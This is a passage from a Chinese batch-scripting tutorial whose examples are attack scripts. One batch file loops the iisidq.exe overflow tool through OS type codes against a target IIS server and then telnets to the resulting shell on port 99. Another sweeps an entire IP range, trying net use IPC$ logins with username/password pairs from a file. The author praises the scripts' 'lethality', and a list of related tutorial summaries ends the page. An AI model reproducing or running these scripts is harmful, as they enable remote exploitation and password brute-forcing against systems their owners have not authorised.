ECHO 墨西哥语: 8
ECHO 墨西哥语+sp1: 9
goto exit /*跳转exit段
:file /*file段显示文件没有发现的信息
echo 文件iis5hack.exe没有发现!程序终止运行!
goto exit /*跳转exit段
:help /*help段显示本批处理的使用格式帮助
echo 本程序用法如下:
echo iis [目标ip]
echo iis [目标ip] [开始的号码9-0]
:exit /*exit段为程序出口
这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大!
例二
这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下:
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。
其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 <idq.bat 目标ip>程序如下:
@echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一
if %1 == "" goto error /*同例一
ping %1 -n 1 | find "Received = 1" /*同例一
if errorlevel 1 goto error1 /*同例一
set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip
set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。
:no /*no段开始
if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。
if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数器来控制其
if %a%==2 set d=2 /*变动。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0 /*变量传递完成后转到标志0处运行
:1
echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......
:0 /*标志0开始
IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good)
if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳
/*转标志1处继续尝试发送
ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执
/*行结果
echo 正在执行第%d%项! /*报告正在溢出的操作系统类型
telnet %b% 99 /*连接溢出端口
echo. /*显示一个空行
if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处(循环出口)
if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no /*附值完成跳转no段执行
:file /*以下都是出错后的帮助提示
echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!
goto exit
:error
echo 错误!目标ip不可识别!请使用下面的格式连接!
echo idq [目标IP]
goto exit
:error1
echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!
echo 请按照下面的格式手工尝试!
echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口]
echo telnet [目标ip] [溢出端口]
:exit /*整个程序的出口
这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为:C:\>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个 for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去,设密码为123 用户名为 abc)
net usr \\218.0.0.1\ipc$ 123 /u:abc
当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改(完整文件见光盘ipc.bat)由兴趣的朋友可以自己看看。修改后的 程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强,至于能加强到什么地步能不能成为一个新的工具那就是你的事了。
这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了,大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要 说简单哦!最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了!!简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和 xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长!
分享到:
相关推荐
【精通批处理教程 v01】是一份详细介绍批处理技术的教程,批处理是Windows操作系统中一种自动化执行一系列命令的方法,通过创建扩展名为BAT的文本文件实现。本教程涵盖了批处理的基本命令和技巧,以下是对这些关键...
批处理编程是Windows操作系统中的一种自动化处理方式,它允许用户通过编写简单的文本脚本来执行一系列命令,极大地提高了工作效率。在本教程中,我们将深入探讨批处理的基本语法和实用技巧。 一、批处理基础 1. **...
【批处理】是一种在Windows操作系统中执行一系列命令的文本文件,通常扩展名为`.bat`。批处理文件的主要目的是简化重复的命令操作,提高工作效率。在本文档中,我们将会深入探讨批处理的基本命令和技巧。 1. **REM ...
从给定的文件信息中,我们可以提炼出一系列与批处理脚本相关的知识点,涉及批处理的基础语法、控制结构以及常用命令。以下是对这些知识点的详细解释: ### 批处理基础知识 #### REM 注释命令 REM 命令用于在批处理...
批处理是一种在DOS和Windows操作系统中用于自动化执行一系列命令的文本文件,通常扩展名为BAT。这种技术虽然不是真正的编程语言,但因其简洁和实用性,常被用于系统管理和维护。本篇教程旨在帮助读者理解并掌握...
这个标准教程全面地介绍了批处理的各个方面,从基础知识到高级应用,旨在帮助读者从入门到精通。 **预备知识** 在学习批处理之前,了解基本的DOS命令和Windows操作系统环境是必要的。批处理脚本基于DOS命令行,因此...
批处理是一种在计算机系统中批量执行...总之,《批处理入门手册》修正版是学习和精通批处理技术的宝贵资源,无论你是计算机新手还是经验丰富的用户,都能从中受益匪浅,进一步提升对Windows批处理的理解和应用能力。
这个"批处理编程教程.chm"文件很可能是一个帮助文档,包含了上述所有内容的详细说明,包括实例演示和实践练习,可以帮助初学者快速上手并精通批处理编程。通过深入学习这个教程,你可以从基础到高级全面掌握批处理...
通过“批处理教程.txt”、“批处理文件制作实例精彩教程.txt”和“精通批处理教程.txt”这三篇文章,你可以深入学习批处理的各个方面,从基础到高级,从理论到实践,全面掌握这一实用技能。无论你是系统管理员、...
4. **精通批处理教材中的重点** - **高级脚本设计**:如何构建复杂的批处理脚本,处理复杂任务,如文件备份、系统维护等。 - **错误处理**:学习如何在批处理中捕获和处理错误,提高脚本的健壮性。 - **批处理与...
批处理(Batch Processing)是计算机领域中一种自动化执行任务的技术,尤其在Windows系统中,批处理文件通常以`.bat`为扩展名。...在实际使用中,应根据需求不断学习和实践,逐渐熟悉并精通批处理技术。
批处理(Batch Processing)是计算机领域中一种自动化执行一系列命令或任务的技术,尤其在DOS系统和Windows系统中被...批处理.doc文档很可能会包含详细的命令解释、实例演示和实践练习,帮助读者逐步精通批处理技术。
总结来说,这个"批处理大全"压缩包是一个全面的学习工具,它提供了一系列的实例和资料,旨在帮助用户从零开始学习并精通批处理技术。无论是对日常系统管理、软件部署还是自动化任务有兴趣的用户,都能从中受益匪浅。...
"入门到精通"的教程可能涵盖以上内容,并逐步深入,教授如何编写复杂的批处理脚本,如何调试和优化脚本性能,以及如何解决在批处理过程中遇到的问题。通过学习,你将能够利用批处理技术提高工作效率,减少手动操作的...
### 批处理文件命令入门到精通 #### 一、什么是批处理文件? 批处理文件是一种包含了一系列预定义命令的文本文件,这些命令会被操作系统逐一执行。通常这些命令都是基于DOS(磁盘操作系统)的命令集,因此也被称为...
批处理是Windows操作系统中一种基于命令行的脚本程序,它是DOS命令的延伸和扩展。批处理文件通常以“.bat”或“.cmd”作为文件扩展名,其内容包含了一系列在命令提示符下可执行的指令。使用批处理文件可以方便地进行...
### 批处理基础教程 #### 一、批处理概述与应用环境 批处理是一种脚本语言,主要用于自动化执行一系列预定义的命令或操作。在不同的操作系统中,批处理文件有不同的扩展名,在DOS系统中通常为`.bat`,而在Windows ...